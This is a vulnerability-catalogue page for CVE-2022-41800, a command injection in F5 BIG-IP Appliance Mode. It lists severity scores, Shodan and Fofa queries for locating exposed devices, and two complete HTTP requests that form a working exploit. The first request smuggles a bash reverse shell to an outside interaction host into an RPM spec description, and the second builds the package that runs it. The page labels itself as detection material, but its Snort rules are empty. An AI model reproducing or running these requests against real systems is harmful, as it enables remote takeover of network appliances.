🔙 목록으로 돌아가기

CVE-2022-41800: F5 BIG-IP Appliance Mode - Command Injection

TitleF5 BIG-IP Appliance Mode - Command Injection
Authordwisiswant0
SeverityHigh
ImpactA successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388).
RemediationApply security patches from F5 Networks as outlined in K97843387 and ensure Appliance mode restrictions are properly enforced.
CVSS Score8.7
EPSS Score0.92701
CVE IDCVE-2022-41800
CWE IDCWE-77
Shodan Queryhttp.title:"big-ip®-+redirect" +"server"http.html:"big-ip apm"
Fofa Querybody="big-ip apm"title="big-ip®-+redirect" +"server"
Tags cve cve2022 rce f5 bigip instrusive vkev vuln

🔍 Vulnerability Description

When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.

🌐 HTTP Request

POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 269
Authorization: Basic YWRtaW46eQ==
Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
Content-Type: application/json
X-F5-Auth-Token: n
Accept-Encoding: gzip
Connection: close

{

  "specFileData": {

    "name": "hbvvyx",

    "srcBasePath": "/tmp",

    "version": "2.0.3",

    "release": "3.0.9",

    "description": "\n\n%check\nbash -i >& /dev/tcp/d5jms09le0o4mn42imf0pue9gpu7c6t5y.oast.live/6922 0>&1",

    "summary": "5gfdywcbyl"

  }

}
POST /mgmt/shared/iapp/build-package HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Length: 121
Authorization: Basic YWRtaW46eQ==
Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
Content-Type: application/json
X-F5-Auth-Token: b
Accept-Encoding: gzip
Connection: close

{

  "state": {},

  "appName": "hbvvyx",

  "packageDirectory": "/tmp",

  "specFilePath": "hfzCzf",

  "force": true

}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-41800.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-41800.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A